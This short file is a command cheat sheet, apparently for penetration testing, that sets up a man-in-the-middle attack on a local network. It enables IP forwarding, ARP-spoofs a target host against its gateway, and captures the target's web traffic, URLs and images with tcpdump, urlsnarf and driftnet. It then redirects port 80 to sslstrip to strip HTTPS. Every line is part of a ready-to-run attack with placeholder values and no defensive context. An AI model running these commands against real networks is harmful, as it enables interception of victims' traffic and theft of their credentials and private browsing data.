echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <rhost> -r <gatewayIp>
tcpdump -i <interface> -A host <rhost> and port 80 > <rhost.txt>
urlsnarf -i <interface>
driftnet -i <interface>
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080